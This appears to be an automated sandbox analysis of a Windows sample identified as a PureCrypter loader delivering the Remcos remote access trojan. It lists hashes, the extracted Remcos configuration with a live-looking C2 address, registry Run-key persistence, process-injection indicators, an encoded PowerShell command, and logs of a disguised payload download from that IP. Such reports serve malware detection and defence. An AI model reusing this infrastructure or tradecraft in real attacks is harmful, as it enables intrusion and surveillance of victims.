Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
03/02/2023, 18:44 UTC
Static task
static1
Behavioral task
behavioral1
Sample
d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
Resource
win10v2004-20220812-en
General
-
Target
d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe
-
Size
7KB
-
MD5
b359f4af5c88b1e237db9738415b7682
-
SHA1
d7fa6d87594ea4d8b5740d54fdc204b08f4e9439
-
SHA256
53ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd
-
SHA512
6d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb
-
SSDEEP
96:xtEsKVeCVIP7bLp8LAn5c8aY1ej/kKV+J2qzNt:xUVVIP7bLrEOejcKYx
Malware Config
Extracted
remcos
RemoteHost
194.180.49.17:28282
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
rdfghfgjkgoighjc.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
true
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-PC1DJ2
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detect PureCrypter injector 1 IoCs
resource yara_rule behavioral1/memory/1080-56-0x0000000007220000-0x00000000074BE000-memory.dmp family_purecrypter -
PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
-
Executes dropped EXE 2 IoCs
pid Process 1304 rdfghfgjkgoighjc.exe 1724 rdfghfgjkgoighjc.exe -
Loads dropped DLL 1 IoCs
pid Process 1632 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe -
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Phecxlkxbf = "\"C:\\Users\\Admin\\AppData\\Roaming\\Zwpfblvosjv\\Phecxlkxbf.exe\"" d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\rdfghfgjkgoighjc.exe\"" d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\rdfghfgjkgoighjc.exe\"" d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ rdfghfgjkgoighjc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\rdfghfgjkgoighjc.exe\"" rdfghfgjkgoighjc.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\ d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Phecxlkxbf = "\"C:\\Users\\Admin\\AppData\\Roaming\\Zwpfblvosjv\\Phecxlkxbf.exe\"" rdfghfgjkgoighjc.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\ rdfghfgjkgoighjc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\rdfghfgjkgoighjc.exe\"" rdfghfgjkgoighjc.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1080 set thread context of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1304 set thread context of 1724 1304 rdfghfgjkgoighjc.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 648 powershell.exe 1504 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe Token: SeDebugPrivilege 648 powershell.exe Token: SeDebugPrivilege 1304 rdfghfgjkgoighjc.exe Token: SeDebugPrivilege 1504 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1724 rdfghfgjkgoighjc.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 1080 wrote to memory of 648 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 28 PID 1080 wrote to memory of 648 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 28 PID 1080 wrote to memory of 648 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 28 PID 1080 wrote to memory of 648 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 28 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1080 wrote to memory of 1632 1080 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 30 PID 1632 wrote to memory of 1304 1632 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 31 PID 1632 wrote to memory of 1304 1632 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 31 PID 1632 wrote to memory of 1304 1632 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 31 PID 1632 wrote to memory of 1304 1632 d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe 31 PID 1304 wrote to memory of 1504 1304 rdfghfgjkgoighjc.exe 32 PID 1304 wrote to memory of 1504 1304 rdfghfgjkgoighjc.exe 32 PID 1304 wrote to memory of 1504 1304 rdfghfgjkgoighjc.exe 32 PID 1304 wrote to memory of 1504 1304 rdfghfgjkgoighjc.exe 32 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34 PID 1304 wrote to memory of 1724 1304 rdfghfgjkgoighjc.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe"C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:648
-
-
C:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exeC:\Users\Admin\AppData\Local\Temp\d7fa6d87594ea4d8b5740d54fdc204b08f4e9439.exe2⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe"C:\ProgramData\Remcos\rdfghfgjkgoighjc.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\ProgramData\Remcos\rdfghfgjkgoighjc.exeC:\ProgramData\Remcos\rdfghfgjkgoighjc.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1724
-
-
-
Network
-
Remote address:194.180.49.17:80RequestGET /Vvlhkp.bmp HTTP/1.1
Host: 194.180.49.17
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Last-Modified: Fri, 03 Feb 2023 02:52:01 GMT
Accept-Ranges: bytes
ETag: "cbc6437d7a37d91:0"
Server: Microsoft-IIS/10.0
Date: Fri, 03 Feb 2023 18:44:49 GMT
Content-Length: 5437440
-
Remote address:194.180.49.17:80RequestGET /Vvlhkp.bmp HTTP/1.1
Host: 194.180.49.17
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Last-Modified: Fri, 03 Feb 2023 02:52:01 GMT
Accept-Ranges: bytes
ETag: "cbc6437d7a37d91:0"
Server: Microsoft-IIS/10.0
Date: Fri, 03 Feb 2023 18:45:23 GMT
Content-Length: 5437440
-
Remote address:8.8.8.8:53Requestgeoplugin.netIN AResponsegeoplugin.netIN A178.237.33.50
-
Remote address:178.237.33.50:80RequestGET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
server: Apache
content-length: 930
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
-
152 B 3
-
112.7kB 5.6MB 2262 4009
HTTP Request
GET http://194.180.49.17/Vvlhkp.bmpHTTP Response
200 -
111.3kB 5.6MB 2237 4005
HTTP Request
GET http://194.180.49.17/Vvlhkp.bmpHTTP Response
200 -
3.0kB 1.5kB 12 13
-
301 B 2.4kB 5 4
HTTP Request
GET http://geoplugin.net/json.gpHTTP Response
200
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5b359f4af5c88b1e237db9738415b7682
SHA1d7fa6d87594ea4d8b5740d54fdc204b08f4e9439
SHA25653ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd
SHA5126d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb
-
Filesize
7KB
MD5b359f4af5c88b1e237db9738415b7682
SHA1d7fa6d87594ea4d8b5740d54fdc204b08f4e9439
SHA25653ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd
SHA5126d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb
-
Filesize
7KB
MD5b359f4af5c88b1e237db9738415b7682
SHA1d7fa6d87594ea4d8b5740d54fdc204b08f4e9439
SHA25653ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd
SHA5126d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD55fec35fdc621e8534c9e3aabe367c39f
SHA183f4512cf0e642441799753180848ef540eda994
SHA2569231873b893f26e3fcc81f15243db686e6f636e7ec10b22ba4399537bdade3d3
SHA51286350e46768be488e9aa25bfec8102c68f1f47da5b69361e20001a59a6b629858ced02bf81780d0c6151031eb9e0d658abdacb9a1a4087ac1fabc051a79acf83
-
Filesize
7KB
MD5b359f4af5c88b1e237db9738415b7682
SHA1d7fa6d87594ea4d8b5740d54fdc204b08f4e9439
SHA25653ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd
SHA5126d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb
-
Filesize
7KB
MD5b359f4af5c88b1e237db9738415b7682
SHA1d7fa6d87594ea4d8b5740d54fdc204b08f4e9439
SHA25653ddb9a75bca1115a66745b28086afbd394cef38f8437dda641b1219111df8cd
SHA5126d4f06f36c608d3202d29629f9d9a70eadfbffbb23c7c074fbb610ed9e1926bf6e04c8dfecbbaf1d575fb2d0385d237aff2dbda322b092d4ef7728091eb596cb